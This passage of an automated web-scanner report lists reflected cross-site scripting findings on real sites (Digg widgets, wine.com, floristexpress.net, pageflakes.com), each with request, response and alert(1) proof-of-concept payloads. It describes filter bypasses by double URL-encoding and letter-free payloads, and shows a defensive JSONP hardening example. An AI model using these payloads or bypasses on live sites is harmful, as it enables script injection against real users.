Set-Cookie: bkc=KJh5NV+/aaWD9m9prIFbVYUeuA6LYa2Jk3kQj4k/0D5+JFks+W/UODD+3vEDeHWokzvW4Fxsaunxxvn/WMvJ4QHY/OPsDWxoPWHuCMI6ztq7foNp4XpL4MF7lcFZpoZfuxeyBAVepITuoTq4AdY/MKeKGBMSY1yjT5hebfAcN7swOc/lvefQT18HUsUMeQar3XZHmcRxNrI3AcRGoFsWK069K2LOPArkAhmTuyvTvPXTOG26paX6rEu9r6xh8xFlIU3XnDAbG8GfDlaArluccTOw79SqEtR84uY7Zw0QsjCca5BXyFzewnbzbOZw7BqBwETrlVXcsvpW2zL8bgxRwrpQN+4UXn/dx9YrdX14HUGImxdcBp+qzP/q2d9JfrJ3qrocL0BYrq2NzGdPzPm2yANTLggh+IieVc2/OJZrY6IChpRY5JdwzBgQ2uc03svva2TDOa9KgzcMpAhzqNLtIELtQ5ADnfyPIdBuMxSV8Dv2c7J2On5n1KDnIIc241ENdaAZ4KW6+NLh8xFqLOfUwxNS4vEgaBz3egdOd4yb269v2dLGf30nyWpNYsdcd+rwNN6Zj07VIXNycdqiG3Xs10I5UF2VEwcY25iAYdW9+62Jp0rZKmasTd7KBwp/OtY09+IEzd7RcNKY04xIZWlhyimTlgcTdAqBatOdIBFJP2rTOhHEFFOhRdbPJT7Rnhm+8ar26C1RwTl8RKcDglRQFNO1IzJprOd1+9nTnhUG26BINzhBXzveKs2twyNu83DE5Q/phx+wszd7peFo595lTJu6wpN4Bl5+ad4ABKZ7SOFZp8lB2fo7Yp4Bn6p82BAEk3rfeAdeSlWBzfm2ckJ1Izn2tJ2at1XhrcXsx3CrPpxlhxLwTflry4PSU5i788Blv5qdEyhMK5Y1dZJ0QI/3hPirN0fL+2A0Qez457L5aLHBIzJOrcILOsLylj732jv5ZIvaifW4To+y7I0xMkB1XzvkHgtaCMrBIPrL6MVvd8PnPNQ2XHmVPvzPnn3f/g7FJcw4PPyjGl720IicEhqwImxMeZfgcITIleIWNhMwSXfAQZErglI8xlYdaQSMwIothc+BI87jLfQdZF6LCMLXkML+Ap+wzKxhb4XIxnqq; expires=Wed, 10-Aug-2011 18:33:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJpf01F9XvQCNJKHyRWJhonMCfcDGqJ1enGXe9hqlyRYhVjyyNMKDakZCMrXWeWZOCAIOGRYP7IQgY0Dhzp99juPAwxsiGAYhS8SmyBj37YEJfWh1eh8SKFnhiecOhmEOnJu2qV9bQYS/iJw; expires=Wed, 10-Aug-2011 18:33:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkou=KJhMRsOQRsn/pgOCuWkvuDT0BDTp1MDlLpxlufWy1WLh1fs61nz61E90uDLtOL3j3PL783xVkVQRSrggJhrSJj+RJ3VZVjGISQMNOHgWy1Sxka6zEylE9aj8va9=; expires=Wed, 10-Aug-2011 18:33:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkp1=KJhMRZOQ19niHytCFGy199y79MG=; expires=Wed, 10-Aug-2011 18:33:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw4=...[SNIP]...; expires=Wed, 10-Aug-2011 18:33:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sat, 12-Feb-2011 18:33:06 GMT; path=/; domain=.bluekai.com
BK-Server: 7b05
Content-Length: 803
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=ebayus_cs=1&betq=7847=399109" width=1 height=1 border=0 alt="">
<img sr
...[SNIP]...
<script>var referrer='http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=200565765597&_trksid=%20p2041474.m622&_trkparms=clkid%3D7016594469467627520'; var hashID='dbdcb53f2576976d806d6498794024fc353f6';alert(1)//c16c49bef95'; var taxonomyJSON=[[27651,5540,5266,3177,19,3],[79063,6463]];</script>
...[SNIP]...

2.65. http://widgets.digg.com/buttons/count [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into a JSON string inside the JSONP response (__DBW.collectDiggs({"url": "...", "diggs": 0})). The payload c78a6<script>alert(1)</script>c0a5c709b0 was submitted in the url parameter. This input was echoed unmodified in the application's response; the JSON encoder escapes neither < nor >.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note, however, that the body is served with Content-Type: application/json and the reflection sits inside a JSON string, so to the JavaScript engine the <script> tags are data, and a browser that honours the declared type never parses them as HTML on a direct visit. The payload executes only where the body is content-sniffed as HTML (older Internet Explorer; no X-Content-Type-Options: nosniff header is sent). Escaping < and > as \u003c and \u003e in the JSON output and adding nosniff closes both paths.
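A JSONP endpoint hardened against both reflections, 2.63 (hostile callback name) and 2.65 (hostile data inside the JSON), as an added example that is not part of the report and is neither eBay's nor Digg's code. The callback and field names copy the two responses; the validation rule, the encoder and the response headers are the editor's assumptions about what the server should do.

```javascript
// Added example (not from the report; not eBay or Digg code): a JSONP endpoint
// hardened against the two reflection patterns in 2.63 and 2.65. The callback and
// field names copy the responses; the handling and headers are assumptions.

// A callback must be a dotted chain of JavaScript identifiers. Anything else
// (';', '(', '//', whitespace) is rejected before it can reach the response body.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;

function isSafeCallbackName(name) {
  return typeof name === 'string' && name.length <= 128 && CALLBACK_RE.test(name);
}

// JSON.stringify yields valid JSON but leaves <, >, & and the line separators
// U+2028/U+2029 untouched. Escaping them keeps the body inert if it is ever
// sniffed or inlined as HTML, while it remains a valid JavaScript literal.
function jsonForScript(value) {
  return JSON.stringify(value).replace(/[<>&\u2028\u2029]/g,
    (ch) => '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

// The response the server should send. nosniff stops older Internet Explorer
// from treating the body as HTML, which is the only way the <script> payload in
// 2.65 could run from a direct visit to the URL.
function buildJsonp(callback, payload) {
  if (!isSafeCallbackName(callback)) {
    throw new Error('invalid JSONP callback name');
  }
  return {
    status: 200,
    headers: {
      'Content-Type': 'application/javascript; charset=utf-8',
      'X-Content-Type-Options': 'nosniff',
    },
    body: callback + '(' + jsonForScript(payload) + ');',
  };
}

// Run a response body the way the embedding page's <script src> would, with the
// Digg collector stubbed and alert() replaced by a counter.
function deliver(body) {
  const received = [];
  let alerts = 0;
  const __DBW = { collectDiggs: (d) => received.push(d) };
  new Function('__DBW', 'alert', body)(__DBW, () => { alerts += 1; });
  return { received, alerts };
}

// Constructed inputs modelled on the two findings (the article URL is shortened).
const DIGG_URL = 'http://www.pcworld.com/article/219333/x.html?tk=hp_fvc78a6<script>alert(1)</script>c0a5c709b0';
const EBAY_CALLBACK = 'vjo.dsf.assembly.VjClientAssembler._callback0d0c65;alert(1)//3c480ac7649';

const ok = buildJsonp('__DBW.collectDiggs', { url: DIGG_URL, diggs: 0 });
console.log(ok.body);          // ...c78a6\u003cscript\u003ealert(1)\u003c/script\u003ec0a5c709b0...
console.log(deliver(ok.body)); // the collector receives the original URL; alert never runs
try {
  buildJsonp(EBAY_CALLBACK, ['', '', 86400]);
} catch (e) {
  console.log('rejected:', e.message);
}
```

The legitimate eBay callback name (vjo.dsf.assembly.VjClientAssembler._callback0) still passes the pattern; only the appended statement is refused. The data path needs no blacklist at all, because the escaped JSON decodes back to the original string inside the callback.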

Request

GET /buttons/count?url=http%3A//www.pcworld.com/article/219333/online_dating_for_nerds_looking_for_love_in_all_the_wrong_postings.html%3Ftk%3Dhp_fvc78a6<script>alert(1)</script>c0a5c709b0 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/219333/online_dating_for_nerds_looking_for_love_in_all_the_wrong_postings.html?tk=hp_fv
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Fri, 11 Feb 2011 19:29:38 GMT
Via: NS-CACHE: 100
Etag: "6907248ba8c229d7c8a253fd71e5626f06790e77"
Content-Length: 202
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Fri, 11 Feb 2011 19:39:37 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "http://www.pcworld.com/article/219333/online_dating_for_nerds_looking_for_love_in_all_the_wrong_postings.html?tk=hp_fvc78a6<script>alert(1)</script>c0a5c709b0", "diggs": 0});

2.66. http://wine.com/ScriptResource.axd [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wine.com
Path:   /ScriptResource.axd

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload a836c<script>alert(1)</script>d5c85703c59 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The reflection is not specific to this resource or to the Lo0P parameter name: the Server: SLRS front end answers an unknown path on wine.com with a text/html 404 page that echoes the full request URL, query string included, without encoding, which is why 2.67 and 2.68 show the same defect on other paths. Encoding the URL in that 404 handler fixes all three.

Request

GET /ScriptResource.axd?d=PgH5St8dPYp-M6V0e1Sv4J62EmWHLuUQLyMUU497oGCvM7n-loDrr_U_qOqjXBQILQ8VIK6G_D8TDkker9cfHYQVHHYRULH-xJWPNgQAM3c1&t=16ab2387&Lo0P=a836c<script>alert(1)</script>d5c85703c59 HTTP/1.1
Host: wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmb=32446520; __utmc=32446520; __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; SL_Audience=484|Accelerated|343|1|0; SL_NV1=1|1

Response

HTTP/1.1 404 Not Found
Server: SLRS
Date: Sun, 13 Feb 2011 13:56:49 GMT
Content-Type: text/html
Content-Length: 376

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /ScriptResource.axd?d=PgH5St8dPYp-M6V0e1Sv4J62EmWHLuUQLyMUU497oGCvM7n-loDrr_U_qOqjXBQILQ8VIK6G_D8TDkker9cfHYQVHHYRULH-xJWPNgQAM3c1&t=16ab2387&Lo0P=a836c<script>alert(1)</script>d5c85703c59 was not found on this server.<P>
...[SNIP]...

2.67. http://wine.com/i-js.js [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wine.com
Path:   /i-js.js

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload bb1ee<script>alert(1)</script>f06a7ee3dc9 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i-js.js?Lo0P=bb1ee<script>alert(1)</script>f06a7ee3dc9 HTTP/1.1
Host: wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; SL_Audience=484|Accelerated|343|1|0; SL_NV1=1|1; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmc=32446520; __utmb=32446520.1.10.1297605361; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Date: Sun, 13 Feb 2011 13:57:09 GMT
Content-Type: text/html
Content-Length: 243

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /i-js.js?Lo0P=bb1ee<script>alert(1)</script>f06a7ee3dc9 was not found on this server.<P>
...[SNIP]...

2.68. http://wine.com/includes/analytics/s_remote_code.js [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wine.com
Path:   /includes/analytics/s_remote_code.js

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 95fbb<script>alert(1)</script>ebf48b3277d was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/analytics/s_remote_code.js?Lo0P=95fbb<script>alert(1)</script>ebf48b3277d HTTP/1.1
Host: wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmb=32446520; __utmc=32446520; __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; SL_Audience=484|Accelerated|343|1|0; SL_NV1=1|1

Response

HTTP/1.1 404 Not Found
Server: SLRS
Date: Sun, 13 Feb 2011 13:56:49 GMT
Content-Type: text/html
Content-Length: 271

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /includes/analytics/s_remote_code.js?Lo0P=95fbb<script>alert(1)</script>ebf48b3277d was not found on this server.<P>
...[SNIP]...

2.69. http://www.floristexpress.net/ [refcode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.floristexpress.net
Path:   /

Issue detail

The value of the refcode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b295e"%3balert(1)//b7f69ae6950 was submitted in the refcode parameter. This input was echoed as B295E";ALERT(1)//B7F69AE6950 in the application's response: the application upper-cases the value before writing it into s.eVar36, and also persists the upper-cased, URL-encoded value in the ref_code cookie it sets.

This proof-of-concept demonstrates that the quoted string can be terminated and arbitrary tokens appended to the script. Because the reflection is upper-cased, the scanner's payload as echoed calls ALERT rather than alert and would fail with a ReferenceError: JavaScript identifiers are case sensitive, and \u escapes do not survive the folding either. A working exploit therefore needs a payload containing no lower-case letters, for example the letter-free constructions built only from the characters []()!+ (the technique commonly known as JSFuck), which can still reach alert or any other function. The string break is real and the finding stands, but the echoed alert(1) should not be read as proof of execution.

Request

GET /?refcode=ORDb295e"%3balert(1)//b7f69ae6950&RefPage=pfc_PRODUCT-30050119 HTTP/1.1
Host: www.floristexpress.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rrefbdf\%22%3balert(document.cookie)//5e820bfb5e
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=IZJPJPS192.168.100.163CKOWO; path=/
Date: Fri, 11 Feb 2011 18:54:01 GMT
Server: Apache
Set-Cookie: PHPSESSID=f5bd434039a4b158c8c4c53fc2d56586; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=a4f657633e93d2b0ff275b5f8026f4ac; path=/
Set-Cookie: ref_code=ORDB295E%22%3BALERT%281%29%2F%2FB7F69AE6950; path=/
Content-Type: text/html
Content-Length: 102831

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Same Day Flower Delivery by Florist E
...[SNIP]...
.eVar9="";
s.eVar13="";
s.eVar14="";
s.eVar18="";
s.eVar22="10:30AM";
s.eVar24="";
s.eVar25="";
s.eVar26="";
s.eVar27="";
s.eVar28="";
s.eVar29="";
s.eVar30="";
s.eVar31="";
s.eVar33="B";
s.eVar36="ORDB295E";ALERT(1)//B7F69AE6950";
s.eVar40="";
s.eVar47="";

s.products="";

s.state="";
s.zip="";
s.purchaseID="";

var s_code=s.t();if(s_code)document.write(s_code);
</script>
...[SNIP]...

2.70. http://www.pageflakes.com/subscribe.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pageflakes.com
Path:   /subscribe.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0ff4'-alert(1)-'4f888188b50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /subscribe.aspxf0ff4'-alert(1)-'4f888188b50 HTTP/1.1
Host: www.pageflakes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 22:07:50 GMT
Server: Microsoft-IIS/6.0
From: web11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: t=; path=/
Set-Cookie: .PAGEFLAKESANON=9BC76F1B6579893AAA7E3D57568305BB0615B8E03528C13E5204E8938370DDFD410D18D6172426FB4E18B2F14D6175990C93D210557DCCFAC6629B1D625451C44E23529EB1F44818C1E494EADE010B5F56458B6D4EF75C4537C38153ED7488C87F8F183984047899AA3E55A08175067496390B27D4A9BAF6E6D6A4EB49AC22F05DB48463CB196E9F47B7AEA8C37D85188B573B342B978A937243D50771E8E5AF; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 14376


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Content-T
...[SNIP]...
<script type="text/javascript" id="StartupJSON">
var __getJsonQueryString = '?userName=subscribe.aspxf0ff4'-alert(1)-'4f888188b50&r=634330300708437500';
document.write('<' + 'script type="text/javascript" id="GetJSON" src="/GetJSON.ashx' + __getJsonQueryString + '">
...[SNIP]...

2.71. http://www.pageflakes.com/subscribe.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pageflakes.com
Path:   /subscribe.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84bfb</script><script>alert(1)</script>3fa53c24637 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Unlike 2.70, the payload does not close the quoted string; it closes the script element. The HTML parser ends a <script> block at the first </script> sequence it meets, whatever the JavaScript string state at that point, so escaping the quote character alone would not have prevented this. Output written into a script string must also neutralise < and / (for example as \x3c and \x2f).

Request

GET /subscribe.aspx?84bfb</script><script>alert(1)</script>3fa53c24637=1 HTTP/1.1
Host: www.pageflakes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 21:51:08 GMT
Server: Microsoft-IIS/6.0
From: web10
X-AspNet-Version: 2.0.50727
Set-Cookie: t=; path=/
Set-Cookie: .PAGEFLAKESANON=DCB00C653606122DEA07BBF080277B1C330C2AD71BA0229AAC13AFE21B33BC0594461B5FC8CD76294B055551EB9082CBA90403BB44876B15A6A51CD7B034D3F44FB804F207869ECC178FB021FC8D7E1F627B71E8CBBD14F0F4F8779C0C382F1A9FEC896EA3EC477DFFF027765A4ED7B9653BAFA74C7F426485810AD9B65F0642B6CD275C3E76A232904AC330E6010AC4563DD63C3CB85D3684F3B35F8D7ECC87; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 986


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Add feed
...[SNIP]...
document.referrer;
}
else
{
//I clicked the "add to pageflakes link". Please add this feed in my pageflakes page
var redirectUrl = 'subscribe2.aspx?84bfb</script><script>alert(1)</script>3fa53c24637=1';
document.location.href="#marker";
document.location.href= redirectUrl;
}
</script>
...[SNIP]...

2.72. http://www.wine.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wine.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c475%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee8d377b4800 was submitted in the REST URL parameter 1. This input was echoed as 2c475"><script>alert(1)</script>e8d377b4800 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. This is the www.wine.com (Microsoft-IIS/6.0) custom 404 page, a different handler from the SLRS 404 page on wine.com in 2.66-2.68: the failing URL is passed to it in the 404;http://... form and written into a hidden input's name attribute without encoding. 2.73 reaches the same defect through a different path segment.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /favicon.ico2c475%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee8d377b4800 HTTP/1.1
Host: www.wine.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; ASPSESSIONIDQSSTAQAD=ICPOLHNDHHJFHHMPPDLMCALO; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmb=32446520; __utmc=32446520; __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 13:56:42 GMT
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; expires=Mon, 13-Feb-2012 13:56:42 GMT; domain=www.wine.com; path=/
Cache-control: private
X-Strangeloop: Compression
Content-Length: 33525


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://www.wine.com:80/favicon.ico2c475"><script>alert(1)</script>e8d377b4800" value="" />
...[SNIP]...

2.73. http://www.wine.com/includes/analytics/s_remote_code.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wine.com
Path:   /includes/analytics/s_remote_code.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b38df%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0fedd55f396 was submitted in the REST URL parameter 1. This input was echoed as b38df"><script>alert(1)</script>0fedd55f396 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /includesb38df%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0fedd55f396/analytics/s_remote_code.js HTTP/1.1
Host: www.wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ef6545857e09
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; ASPSESSIONIDQSSTAQAD=ICPOLHNDHHJFHHMPPDLMCALO

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 14:21:39 GMT
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Length: 33439
Content-Type: text/html
Set-Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; expires=Mon, 13-Feb-2012 14:21:38 GMT; domain=www.wine.com; path=/
Cache-control: private


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://www.wine.com:80/includesb38df"><script>alert(1)</script>0fedd55f396/analytics/s_remote_code.js" value="" />
...[SNIP]...

2.74. http://www.wine.com/includes/analytics/s_remote_code.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wine.com
Path:   /includes/analytics/s_remote_code.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6a54%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee7bcbf825c9 was submitted in the REST URL parameter 2. This input was echoed as b6a54"><script>alert(1)</script>e7bcbf825c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /includes/analyticsb6a54%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee7bcbf825c9/s_remote_code.js HTTP/1.1
Host: www.wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ef6545857e09
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; ASPSESSIONIDQSSTAQAD=ICPOLHNDHHJFHHMPPDLMCALO

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 14:21:46 GMT
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; expires=Mon, 13-Feb-2012 14:21:46 GMT; domain=www.wine.com; path=/
Cache-control: private
X-Strangeloop: Compression
Content-Length: 33439


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://www.wine.com:80/includes/analyticsb6a54"><script>alert(1)</script>e7bcbf825c9/s_remote_code.js" value="" />
...[SNIP]...

